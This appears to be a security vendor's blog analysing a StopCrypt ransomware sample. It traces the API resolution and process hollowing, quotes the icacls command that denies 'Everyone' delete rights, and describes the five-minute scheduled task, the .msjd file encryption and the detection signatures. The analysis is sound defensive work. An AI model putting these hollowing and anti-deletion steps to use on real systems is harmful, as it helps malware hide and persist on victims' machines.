The malware resolves the addresses of the following APIs:

  • MessageBoxA
  • GetMessageExtraInfo
  • WinExec
  • CreateFileA
  • WriteFile
  • CloseHandle
  • CreateProcessA
  • GetThreadContext
  • VirtualAlloc
  • VirtualAllocEx
  • VirtualFree
  • ReadProcessMemory
  • WriteProcessMemory
  • SetThreadContext
  • ResumeThread
  • WaitForSingleObject
  • GetModuleFileNameA
  • GetCommandLineA
  • NtUnmapViewOfSection
  • NtWriteVirtualMemory
  • RegisterClassExA
  • CreateWindowExA
  • PostMessageA
  • GetMessageA
  • DefWindowProcA
  • GetFileAttributesA
  • GetStartupInfoA
  • VirtualProtectEx

The Ransomware then checks the FileAttributes of the non-existent file “apfHQ” using the kernel32_GetFileAttributesA API.

Figure 5: Kernel32_GetFileAttributesA Win32 API call

The purpose for this operation is not known – this could be a marker to identify specific systems where the file might be present.

The ransomware then registers a window class called “saodkfnosa9uin” using the user32_RegisterClassExA API.

Figure 6: Kernel32_RegisterClassExA Win32 API call

It then calls user32_CreateWindowExA API to create the window.

The ransomware calls the VirtualAlloc API to allocate memory with READ and WRITE permissions to store the path returned by the GetModuleFileNameA API. The path is the current location from which the ransomware is running. Next, it calls the kernel32.GetStartupInfoA API to retrieve startup information.

Figure 7: Kernel32_GetStartupInfoA Win32 API call

Using the kernel32_CreateProcessA API, it launches its own copy as a new process in a suspended state. This is where the process hollowing begins.

Figure 8: Kernel32_CreateProcessA Win32 API call

The GetThreadContext API is called to retrieve the context of a specific thread:

Figure 9: Kernel32_GetThreadContext Win32 API call

The ReadProcessMemory API is used to get the loaded base address of the image.

The Ntdll_NtUnmapViewOfSection API is used to unmap a view of a section from the virtual address space of the process.

Figure 10: Ntdll_NtUnmapViewOfSection Win32 API call

The VirtualAllocEx API is used to allocate new space in the newly created process.

Figure 11: Kernel32_VirtualAllocEx Win32 API call

The Ntdll_NtWriteVirtualMemory API is used multiple times to write the data into the memory of the newly created process which is in a suspended state.

Figure 12: Ntdll_NtWriteVirtualMemory Win32 API call

Once the data has been written section by section into the memory of the remote suspended process, it calls the Kernel32_SetThreadContext API. The SetThreadContext API is used to set the context of the remote thread so that it starts at the newly written image:

Figure 13: Kernel32_SetThreadContext Win32 API call

The ResumeThread API is then used to resume the main thread of the suspended process, starting execution of the written image.

Final Payload

The ransomware then launches the resumed process with the following parameter: “–Admin IsNotAutoStart IsNotTask”.

Figure 14: Launching process with “–Admin IsNotAutoStart IsNotTask” as a parameter

The ransomware creates a new directory in C:\Users\<user_name>\AppData\Local and copies the current malware image (binary) into it.

It then launches the “icacls.exe” process, which is the command-line utility used to view and modify access control lists (ACLs) in Windows.

The command icacls.exe <path> /deny “s-1-1-0:(OI)(CI)(DE,DC)” is used to deny permissions for a specific security identifier (SID) on a file or directory in Windows.

Overall, this command denies the “Everyone” group (SID S-1-1-0) permission to delete the specified file or directory and its contents, effectively restricting the ability to modify or delete it.

Figure 15: Using the Icacls command to deny permission for deleting file or directory

The ransomware creates a scheduled task that executes a copy of the final payload with the command-line argument “–Task” every five minutes.

Figure 16: Task added in the task scheduler.

The ransomware encrypts the files and appends the .msjd extension to the encrypted files.

Figure 17: Ransomware encrypted filenames

The ransom note is kept in every encrypted folder as _readme.txt.

Figure 18: Ransomware note

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: StopCrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.


*This blog was originally titled in a way that indicated this was a new ransomware variant. That was an error and has been corrected.